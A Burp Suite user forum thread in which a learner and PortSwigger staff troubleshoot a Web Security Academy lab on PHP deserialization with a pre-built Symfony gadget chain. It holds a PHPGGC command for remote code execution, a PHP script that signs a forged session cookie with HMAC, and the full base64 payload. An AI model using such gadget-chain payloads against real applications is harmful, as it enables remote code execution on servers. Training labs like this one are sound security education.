Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Exploiting PHP deserialization with a pre-built gadget chain

danBogom | Last updated: Apr 27, 2022 09:08PM UTC

Hello I have a problem with this lab, when I send my payload I got a next error: <div class="container"> <header class="navigation-header"> </header> <h4>Internal Server Error: Symfony Version: 4.3.6</h4> <p class=is-warning>PHP Fatal error: Uncaught Error: Call to a member function commit() on null in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php:142 Stack trace: #0 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(286): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;invalidateTags() #1 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(291): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;commit() #2 [internal function]: Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;__destruct() #3 Command line code(10): unserialize() #4 {main} thrown in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php on line 142</p> </div> I review my payload several times and can't find where I may take a mistake. Then I try to submit my solution after lab environment restart and I had the same error.

Ben, PortSwigger Agent | Last updated: Apr 28, 2022 07:51AM UTC

Hi Denis, Just to confirm, you are seeing this as a result of the request containing the malicious cookie that you have created in step 8 of the solution? If so, are you able to provide us with details of the script that you are using to create the malicious cookie and what request you are sending in Repeater so that we can take a look at this for you?

danBogom | Last updated: Apr 28, 2022 08:56AM UTC

Hi To generate the payload, I used the script that was in the solution: <?php $object = base64_encode(./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt'); $secretKey = SECRET_KEY; $cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}'); echo $cookie; ?> And provided this payload through session=%7B%22token%22%3A%22Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyZGVmZXJyZWQiO2E6MTp7aTowO086MzM6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXENhY2hlSXRlbSI6Mjp7czoxMToiKnBvb2xIYXNoIjtpOjE7czoxMjoiKmlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXJwb29sIjtPOjQ0OiJTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFByb3h5QWRhcHRlciI6Mjp7czo1NDoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXJwb29sSGFzaCI7aToxO3M6NTg6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319%22%2C%22sig_hmac_sha1%22%3A%2282ee1fd1a43bf4ddf718e8ce61614f805e73798a%22%7D

Hannah, PortSwigger Agent | Last updated: Apr 29, 2022 08:59AM UTC

Hi Have you tried using PHPGCC separately to the rest of your PHP script, then inserting the output to the rest of the script? Additionally, have you had a look at any video solutions for this lab? You can find one here: https://www.youtube.com/watch?v=WmO8Kad0M7Y

danBogom | Last updated: Apr 29, 2022 09:08AM UTC

Hi Of course I used PHPGGC separately and tested the video solution, I just showed what payload I generate for Base64 encoding, to test my PHPGGC output just the base64_decode token I provided above. PHPGGC payload: O:47:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:57:"Symfony\Component\Cache\Adapter\TagAwareAdapterdeferred";a:1:{i:0;O:33:"Symfony\Component\Cache\CacheItem":2:{s:11:"*poolHash";i:1;s:12:"*innerItem";s:26:"rm /home/carlos/morale.txt";}}s:53:"Symfony\Component\Cache\Adapter\TagAwareAdapterpool";O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":2:{s:54:"Symfony\Component\Cache\Adapter\ProxyAdapterpoolHash";i:1;s:58:"Symfony\Component\Cache\Adapter\ProxyAdaptersetInnerItem";s:4:"exec";}}

Liam, PortSwigger Agent | Last updated: May 11, 2022 09:25AM UTC

We're going to follow up with some additional testing. We'll get back to you ASAP. Thanks for your patience.

Liam, PortSwigger Agent | Last updated: May 12, 2022 09:37AM UTC

Hi Denis. We haven't been able to reproduce the issue you encountered. Are you still experiencing problems with this lab?

danBogom | Last updated: May 19, 2022 10:25AM UTC

Hi Tried again today and have the same problem: PHP Fatal error: Uncaught Error: Call to a member function commit() on null in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php:142 Stack trace: #0 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(286): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;invalidateTags() #1 /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php(291): Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;commit() #2 [internal function]: Symfony\Component\Cache\Adapter\TagAwareAdapter-&gt;__destruct() #3 Command line code(10): unserialize() #4 {main} thrown in /usr/local/envs/php-symfony-4.3.6/vendor/symfony/symfony/src/Symfony/Component/Cache/Adapter/TagAwareAdapter.php on line 142

Ben, PortSwigger Agent | Last updated: May 19, 2022 10:59AM UTC

Hi Denis, Just to confirm, you are running something similar to the following (the object value will remain consistent throughout different lab sessions whereas the secretKey will be unique to each lab session and will need to be obtained from the /cgi-bin/phpinfo.php request each time): <?php $object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg=="; $secretKey = "styx0w1ajtildyjeuznn370wa3f2i24m"; $cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}'); echo $cookie; You are then taking the output of this script and using it to replace the cookie value in an existing request within Repeater (a request that contains the session cookie after you have logged in with the 'wiener' user)? I have run through this process twice, using this site to run the script (https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler) and have been able to solve the lab using this approach both times. Perhaps it might be easier if you send us an email to support@portswigger.net and include some screenshots of what you are doing at each stage so that we can see if we can spot anything out of the ordinary.

Pump | Last updated: Jun 19, 2023 03:56PM UTC

Thanks, I would like to know how this object was generated. $object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==";

Ben, PortSwigger Agent | Last updated: Jun 20, 2023 06:46AM UTC

Hi, That is the Base-64 encoded object that is generated by using the PHPGGC tool (this is detailed in Step 7 of the written solution).

Lucian | Last updated: Aug 20, 2023 12:37PM UTC

I had the same problem as you. The solution is simple, you have to pipe the result of the phpggc command to a file and then apply Base64 on that file content instead of applying Base64 to the string copied from the console output. That is because there are some non-ASCII characters in the generated output that you will miss (you wil not see them) when you copy the output from the console.

You need to Log in to post a reply. Or register here, for free.